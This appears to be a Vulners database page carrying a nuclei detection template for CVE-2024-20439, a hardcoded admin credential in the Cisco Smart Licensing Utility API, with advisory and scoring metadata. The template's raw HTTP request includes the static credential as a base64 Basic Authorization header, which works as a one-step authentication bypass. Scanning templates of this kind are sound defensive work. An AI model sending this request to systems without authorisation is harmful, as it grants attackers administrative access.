Lucene search
K

Hardcoded Admin Credentials For Cisco Smart Licensing Utility API

🗓️ 25 Jun 2026 01:31:50Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

Hardcoded Admin Credentials in Cisco Smart Licensing Utilit

Related
Refs
Code
id: CVE-2024-20439

info:
  name: Hardcoded Admin Credentials For Cisco Smart Licensing Utility API
  author: iamnoooob,parthmalhotra,pdresearch
  severity: critical
  description: |
    A vulnerability in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to log in to an affected system by using a static administrative credential.This vulnerability is due to an undocumented static user credential for an administrative account. An attacker could exploit this vulnerability by using the static credentials to log in to the affected system. A successful exploit could allow the attacker to log in to the affected system with administrative privileges over the API of the Cisco Smart Licensing Utility application.
  impact: |
    Unauthenticated attackers can log in with administrative privileges using hardcoded credentials to access sensitive API functions and compromise the system.
  remediation: |
    Update Cisco Smart Licensing Utility to a version that removes hardcoded credentials.
  reference:
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-20439
    cwe-id: CWE-912
    epss-score: 0.9201
    epss-percentile: 0.99806
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,cisco,smart,licensing,auth-bypass,kev,vkev,vuln

http:
  - raw:
      - |
        GET /cslu/v1/scheduler/jobs HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"job_name":'
          - '"current_status":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402203420c6319ef25e29f5c6fbf0577c34e39af72ad86a0094fb1424e6fb58da3a75022060424c69cb38ef7394726c85e4d22a03ff9537a6e57cc76a8887a2cd9cacd9b4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
EPSS0.9201
SSVC
44